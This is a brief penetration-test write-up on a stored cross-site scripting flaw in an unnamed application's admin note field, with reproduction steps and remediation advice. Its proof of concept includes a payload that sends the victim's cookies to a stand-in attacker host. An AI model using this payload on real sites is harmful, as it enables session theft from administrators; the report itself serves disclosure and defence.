Penetration Testing Writeup: XSS in Admin Panel

Executive Summary

A Stored Cross-Site Scripting (XSS) vulnerability was found in [Target Application]’s admin panel during a penetration test. This allows attackers to inject scripts into admin inputs, affecting admin users. This report details the issue and remediation steps.

Vulnerability Details

Description

The admin note field does not sanitize inputs before storing and displaying them, allowing script execution in the admin panel.

Impact

Proof of Concept

  1. In the admin panel, add a note: <script>alert('Stored XSS');</script>.
  2. View the note and observe the alert.
  3. Malicious payload: <script>fetch('https://attacker.com/steal?cookie='+document.cookie);</script>.

Steps to Reproduce

  1. Log in to https://[target-application]/admin/notes.
  2. Add a note with <script>alert('Stored XSS');</script>.
  3. View the note to confirm the alert.

Remediation Recommendations

  1. Input Sanitization:
    • Use OWASP AntiSamy for note inputs.
  2. Output Encoding:
    • Encode notes before rendering.
  3. Content Security Policy:
    • Apply CSP: Content-Security-Policy: script-src 'self';.
  4. Secure Development:
    • Train admins and developers on XSS prevention.
  5. Security Testing:
    • Conduct regular audits.

Conclusion

The Stored XSS vulnerability in [Target Application]’s admin panel is critical and requires immediate remediation.

References

Admin XSS Example